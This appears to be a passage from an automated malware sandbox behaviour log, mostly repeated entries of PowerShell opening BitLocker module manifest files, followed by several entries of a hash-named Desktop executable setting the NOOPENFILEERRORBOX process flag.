Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
